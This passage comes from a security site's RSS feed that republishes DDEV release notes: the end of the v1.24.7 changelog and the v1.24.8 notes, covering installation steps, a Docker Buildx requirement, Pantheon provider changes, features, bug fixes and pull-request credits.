<li>feat: return real exit code from <code>ddev exec</code> and add quiet flag to it, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1101372493" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/3518" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/3518/hovercard" href="https://github.com/ddev/ddev/issues/3518">#3518</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andreashager/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andreashager">@andreashager</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3152834848" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7385" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7385/hovercard" href="https://github.com/ddev/ddev/pull/7385">#7385</a></li>
<li>fix: Include ddev-hostname in main build zipballs, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3194145159" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7420" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7420/hovercard" href="https://github.com/ddev/ddev/issues/7420">#7420</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3220513266" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7443" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7443/hovercard" href="https://github.com/ddev/ddev/pull/7443">#7443</a></li>
<li>feat: Windows Native and WSL2 GUI installer by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3179143567" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7404" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7404/hovercard" href="https://github.com/ddev/ddev/pull/7404">#7404</a></li>
<li>build: bump github.com/spf13/cobra to latest commit, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3130460664" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7361" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7361/hovercard" href="https://github.com/ddev/ddev/issues/7361">#7361</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3222958615" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7445" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7445/hovercard" href="https://github.com/ddev/ddev/pull/7445">#7445</a></li>
<li>fix: avoid mutating input slice in <code>cmd.prettyCmd()</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3224252241" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7448" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7448/hovercard" href="https://github.com/ddev/ddev/pull/7448">#7448</a></li>
<li>fix: remove unneeded <code>ddev-hostname</code> dependencies to reduce size, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3180281142" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7408" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7408/hovercard" href="https://github.com/ddev/ddev/issues/7408">#7408</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3221054383" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7444" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7444/hovercard" href="https://github.com/ddev/ddev/issues/7444">#7444</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3223578542" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7446" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7446/hovercard" href="https://github.com/ddev/ddev/pull/7446">#7446</a></li>
<li>fix: Improve Windows installer behavior (actually exit on errors) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3228702000" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7452" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7452/hovercard" href="https://github.com/ddev/ddev/pull/7452">#7452</a></li>
<li>docs: add info about proxy for Docker client, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3183771499" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7412" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7412/hovercard" href="https://github.com/ddev/ddev/issues/7412">#7412</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3229126212" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7454" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7454/hovercard" href="https://github.com/ddev/ddev/pull/7454">#7454</a></li>
<li>docs: How to use Xdebug with Composer for plugin development by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obriat/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obriat">@obriat</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3196281524" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7423" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7423/hovercard" href="https://github.com/ddev/ddev/pull/7423">#7423</a></li>
<li>fix: show errors for custom commands when flags are parsed, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3180910057" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7409" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7409/hovercard" href="https://github.com/ddev/ddev/issues/7409">#7409</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3228650151" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7451" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7451/hovercard" href="https://github.com/ddev/ddev/pull/7451">#7451</a></li>
<li>build: Add a ddev-wsl2 package especially for ddev-hostname.exe, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3203771294" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7428" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7428/hovercard" href="https://github.com/ddev/ddev/issues/7428">#7428</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3224361917" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7449" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7449/hovercard" href="https://github.com/ddev/ddev/pull/7449">#7449</a></li>
<li>fix: temporarily allow write to <code>/etc/mysql/conf.d/*</code> for <code>db</code> container restart, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3236996923" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7457" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7457/hovercard" href="https://github.com/ddev/ddev/issues/7457">#7457</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/das-peter/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/das-peter">@das-peter</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3237008495" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7458" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7458/hovercard" href="https://github.com/ddev/ddev/pull/7458">#7458</a></li>
<li>test: do tests of windows installer, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3215964030" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7440" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7440/hovercard" href="https://github.com/ddev/ddev/issues/7440">#7440</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3237200816" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7459" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7459/hovercard" href="https://github.com/ddev/ddev/pull/7459">#7459</a></li>
<li>fix: Windows installer shouldn't be so aggressive in removing CAROOT by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3243385026" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7461" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7461/hovercard" href="https://github.com/ddev/ddev/pull/7461">#7461</a></li>
<li>build: bump images to v1.24.7 for release, docker-compose v2.38.2 (<code>COMPOSE_BAKE=false</code>), fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3151094546" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7383" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7383/hovercard" href="https://github.com/ddev/ddev/issues/7383">#7383</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3236739642" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7456" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7456/hovercard" href="https://github.com/ddev/ddev/pull/7456">#7456</a></li>
<li>docs: add <code>.wslconfig</code> example for mirrored networking mode in WSL2 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3243983372" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7463" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7463/hovercard" href="https://github.com/ddev/ddev/pull/7463">#7463</a></li>
<li>docs: minor update to manual ddev instructions and use apt-get by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3244179939" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7465" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7465/hovercard" href="https://github.com/ddev/ddev/pull/7465">#7465</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lozcalver/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lozcalver">@lozcalver</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3082652953" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7326" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7326/hovercard" href="https://github.com/ddev/ddev/pull/7326">#7326</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chenrui333/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chenrui333">@chenrui333</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3166254681" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7395" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7395/hovercard" href="https://github.com/ddev/ddev/pull/7395">#7395</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dolmen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dolmen">@dolmen</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3167828127" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7396" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7396/hovercard" href="https://github.com/ddev/ddev/pull/7396">#7396</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obriat/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obriat">@obriat</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3196281524" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7423" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7423/hovercard" href="https://github.com/ddev/ddev/pull/7423">#7423</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/das-peter/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/das-peter">@das-peter</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3237008495" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7458" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7458/hovercard" href="https://github.com/ddev/ddev/pull/7458">#7458</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/ddev/ddev/compare/v1.24.6...v1.24.7"><tt>v1.24.6...v1.24.7</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v1.24.8]]></title>
<description><![CDATA[Installation
See the installation instructions for details, but it's easy:

macOS: brew install ddev/ddev/ddev or just brew upgrade ddev.
Linux: Use apt install ddev or apt upgrade ddev see apt/yum installation
Windows and WSL2: Download the ddev_windows_amd64_installer.v1.24.8.exe; you can run i...]]></description>
<link>https://tsecurity.de/de/3497300/downloads/v1248/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3497300/downloads/v1248/</guid>
<pubDate>Thu, 07 May 2026 22:17:25 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Installation</h2>
<p>See the <a href="https://docs.ddev.com/en/stable/users/install/ddev-installation/" rel="nofollow">installation instructions</a> for details, but it's easy:</p>
<ul>
<li>macOS: <code>brew install ddev/ddev/ddev</code> or just <code>brew upgrade ddev</code>.</li>
<li>Linux: Use <code>apt install ddev</code> or <code>apt upgrade ddev</code> see <a href="https://docs.ddev.com/en/stable/users/install/ddev-installation/#linux" rel="nofollow">apt/yum installation</a></li>
<li>Windows and WSL2: Download the <a href="https://github.com/ddev/ddev/releases/download/v1.24.8/ddev_windows_amd64_installer.v1.24.8.exe">ddev_windows_amd64_installer.v1.24.8.exe</a>; you can run it for install or upgrade.</li>
<li>Consider <code>ddev delete images</code> or <code>ddev delete images --all</code> after upgrading to free up disk space used by previous Docker image versions. This does no harm.</li>
<li>Consider <code>ddev config --auto</code> to update your projects to current configuration.</li>
</ul>
<h2><g-emoji class="g-emoji" alias="warning">⚠️</g-emoji> Docker Buildx is now required for Docker Compose</h2>
<blockquote>
<p><strong>Warning:</strong> <code>Docker Compose is configured to build using Bake, but buildx isn't installed</code></p>
</blockquote>
<blockquote>
<p><strong>Error:</strong> <code>fork/exec ~/.docker/cli-plugins/docker-buildx: no such file or directory</code></p>
</blockquote>
<p>Docker Compose changed its default builder to Bake in <a href="https://github.com/docker/compose/releases/tag/v2.37.0">v2.37.0</a>.</p>
<p>DDEV v1.24.7 and below used older Docker Compose versions that relied on the legacy builder, but v1.24.8 uses a newer Docker Compose version that defaults to Bake, which requires Docker Buildx.</p>
<p><strong>Solution:</strong> Ensure Docker Buildx is installed on your system. Most modern Docker installations include Buildx by default, but if you encounter this error, you may need to update Docker or manually install the Buildx plugin.</p>
<h2><g-emoji class="g-emoji" alias="warning">⚠️</g-emoji> Pantheon provider changes</h2>
<p>DDEV v1.24.8 provides <code>.ddev/providers/pantheon.yaml</code> by default, which means if you already have this file with a <code>#ddev-generated</code> line inside, it will be overridden on upgrade:</p>
<ul>
<li>See the configuration changes directly in <code>.ddev/providers/pantheon.yaml</code></li>
<li>Learn how to set the <code>PANTHEON_SITE</code> and <code>PANTHEON_ENVIRONMENT</code> variables in <a href="https://docs.ddev.com/en/stable/users/providers/pantheon/" rel="nofollow">Pantheon Integration</a>.</li>
</ul>
<p>If you want to keep using <code>.ddev/providers/pantheon.yaml</code> from DDEV v1.24.7 and below:</p>
<ul>
<li>Remove the <code>#ddev-generated</code> line from your existing file and commit the change to git. DDEV will then leave your customized configuration untouched.</li>
<li>Or rename it to <code>.ddev/providers/&lt;anything&gt;.yaml</code>, for example <code>.ddev/providers/staging.yaml</code>, and use it with <code>ddev pull staging</code>.</li>
</ul>
<h2>Highlights</h2>
<ul>
<li>Experimental support for add-ons <a href="https://docs.ddev.com/en/stable/users/extend/creating-add-ons/#action-types-bash-vs-php" rel="nofollow">written primarily in PHP</a></li>
<li><code>ddev add-on get</code> can now automatically download add-on dependencies</li>
<li><code>ddev add-on get &lt;your **PRIVATE** GitHub repo&gt;</code>: Support for <code>DDEV_GITHUB_TOKEN</code> as a bearer token for GitHub downloads and private GitHub add-ons</li>
<li>Support for alternative GitHub token environment variables: <code>DDEV_GITHUB_TOKEN</code> (highest priority), <code>GH_TOKEN</code> (lower priority than <code>DDEV_GITHUB_TOKEN</code>), <code>GITHUB_TOKEN</code> (lowest priority)</li>
<li>Parallel Docker image pulls for faster performance, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/glensc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/glensc">@glensc</a> for the idea</li>
<li>Improved <a href="https://docs.ddev.com/en/stable/users/providers/pantheon/" rel="nofollow">Pantheon provider</a> support, <code>.ddev/providers/pantheon.yaml</code> provided by default</li>
<li>Upsun support for <a href="https://docs.ddev.com/en/stable/users/providers/upsun/#managing-multiple-apps" rel="nofollow">multiple apps</a> and <a href="https://docs.ddev.com/en/stable/users/providers/upsun/#managing-multiple-databases" rel="nofollow">multiple databases</a></li>
<li><a href="https://docs.ddev.com/" rel="nofollow">https://docs.ddev.com/</a> is now the canonical documentation source (replaces <a href="https://ddev.readthedocs.io/" rel="nofollow">https://ddev.readthedocs.io/</a>)</li>
<li>Dynamic DDEV project sponsorship information if provided once a day on <code>ddev start</code>.</li>
</ul>
<h2>Features</h2>
<ul>
<li><a href="https://docs.ddev.com/en/stable/users/usage/commands/#debug-download-images" rel="nofollow"><code>ddev debug download-images --all</code></a> now pulls all images for all projects</li>
<li><a href="https://docs.ddev.com/en/stable/users/usage/commands/#heidisql" rel="nofollow"><code>ddev heidisql</code></a> now works on Linux, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/punkrock34/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/punkrock34">@punkrock34</a></li>
<li>New <a href="https://docs.ddev.com/en/stable/users/usage/commands/#npx" rel="nofollow"><code>ddev npx</code></a> global command, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dragonwize/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dragonwize">@dragonwize</a></li>
<li><code>host.docker.internal</code> now available in all containers, not just <code>web</code></li>
<li>Pantheon provider now always pulls current upstream database (instead of a backup) and uses the Terminus rsync plugin for file push, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/danny2p/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/danny2p">@danny2p</a></li>
<li>Traefik healthcheck extended to validate file routers and detect config errors</li>
<li>Improved support for <code>ddev config global --no-bind-mounts</code> with automated testing</li>
<li>Manual testing with macOS 26 Tahoe (beta) shows no obvious problems; All Docker providers were casually tested.</li>
</ul>
<h2>Bug Fixes</h2>
<ul>
<li>Fix non-working <code>ddev-hostname</code> for Homebrew installations on Linux</li>
<li>Add missing ephemeral port handling to XHGui service, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a></li>
<li>Allow <code>.DS_Store</code> files in <code>ddev composer create-project</code></li>
<li>Fix <code>ddev describe</code> to show exposed ports correctly on new Docker Desktop versions</li>
<li>Fix nginx configuration for Backdrop routes conflicting with directories</li>
<li>Use stable branch for <code>magerun</code> autocompletion script</li>
<li>Don't edit Laravel database config in <code>.env</code> when no database is present, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cyppe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cyppe">@cyppe</a></li>
<li>Remove obsolete PHP 8.4 <code>php.ini</code> configuration, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kaystrobach/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kaystrobach">@kaystrobach</a> for the report</li>
<li>Improve handling of "Failed to copy script" errors in the Windows installer</li>
</ul>
<h2>Internal Improvements</h2>
<ul>
<li>Major refactoring of internal Docker logic to reduce API calls and improve error handling</li>
<li>Set 20-minute download timeout for <code>docker-compose</code> and retry with doubled timeout on context deadline exceeded</li>
<li>Remove <code>docker context inspect</code> calls from each <code>ddev</code> command and use the Docker CLI API</li>
<li><code>ddev auth ssh</code> now uses the Docker API instead of <code>docker run</code> and supports stdin</li>
<li>Better reporting of MariaDB/MySQL/PostgreSQL client installation failures; removed download timeouts</li>
<li>Replace the Docker image <code>busybox:stable</code> with <code>ddev/ddev-utilities:latest</code> for internal use</li>
</ul>
<h2>Minor Updates</h2>
<ul>
<li>PHP 8.3.25 and 8.4.12</li>
<li>Xdebug 3.4.5</li>
<li>Docker Compose v2.39.3</li>
<li>Add SVG support to TYPO3 nginx rewrite rules, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dhuf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dhuf">@dhuf</a></li>
<li>Disable <code>innodb_use_native_aio</code> for MariaDB 10.6 (upstream change)</li>
<li>Forward <code>*_PROXY</code> and <code>DDEV_*</code> environment variables for <code>root</code> user in <code>web</code> container</li>
<li>Add DDEV version output to <code>ddev describe</code>, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tomasnorre/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tomasnorre">@tomasnorre</a></li>
<li>Add warnings for empty pull/push operations in hosting providers</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>docs: Add CLAUDE.md to provide general prompts about behavior by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3245720727" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7467" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7467/hovercard" href="https://github.com/ddev/ddev/pull/7467">#7467</a></li>
<li>fix: Allow .DS_Store when doing ddev composer create-project [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3248128610" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7469" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7469/hovercard" href="https://github.com/ddev/ddev/pull/7469">#7469</a></li>
<li>ci: install <code>ddev</code> on Windows before test by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3249747042" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7471" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7471/hovercard" href="https://github.com/ddev/ddev/pull/7471">#7471</a></li>
<li>refactor: use <code>compose-spec/compose-go/v2</code> for <code>fixupComposeYaml</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3195817486" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7422" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7422/hovercard" href="https://github.com/ddev/ddev/pull/7422">#7422</a></li>
<li>test: add a no-interaction flag to the install command in ibexa bats file by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3257068260" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7479" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7479/hovercard" href="https://github.com/ddev/ddev/pull/7479">#7479</a></li>
<li>docs: note about <code>Flags</code> annotation with unknown flags, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3228650151" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7451" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7451/hovercard" href="https://github.com/ddev/ddev/pull/7451">#7451</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3256954032" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7478" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7478/hovercard" href="https://github.com/ddev/ddev/pull/7478">#7478</a></li>
<li>feat: update Pantheon provider to use environment variables, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1627492558" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/4760" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/4760/hovercard" href="https://github.com/ddev/ddev/issues/4760">#4760</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3253933952" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7475" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7475/hovercard" href="https://github.com/ddev/ddev/pull/7475">#7475</a></li>
<li>docs: Fix links pantheon.yaml.example -&gt; pantheon.yaml by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3257768359" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7481" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7481/hovercard" href="https://github.com/ddev/ddev/pull/7481">#7481</a></li>
